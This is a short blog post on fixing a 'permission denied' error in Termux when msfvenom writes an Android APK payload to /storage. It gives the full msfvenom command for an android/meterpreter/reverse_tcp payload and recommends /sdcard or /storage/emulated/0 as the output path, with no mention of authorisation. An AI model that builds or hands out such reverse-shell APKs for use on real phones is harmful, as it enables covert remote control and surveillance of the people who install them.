Metasploit payload creating permission denied in termux

Hello guy’s in this article we are going to discuss about how to solve metasploit payload creation permissions denied problem.

If you use termux application means definitely you use metasploit package most of the people successfully make payloads but some people get this error.

msfvenom -p android/meterpreter/reverse_tcp LHOST= ip
LPORT=4444 R > /storage/errorsfind.apk

This above command we’ve use to make android payload most of the time this command did not make any error but some time get this blow error.

base: /storage/errorsfind.apk: permission denied 

Solution

The solution is very simple The storage directory is requires root access so type location of apk command this below

/storage/emulated/0/errorsfind.apk

The alternate simple command is 

/sdcard/errorsfind.apk 

Post a Comment

Previous Post Next Post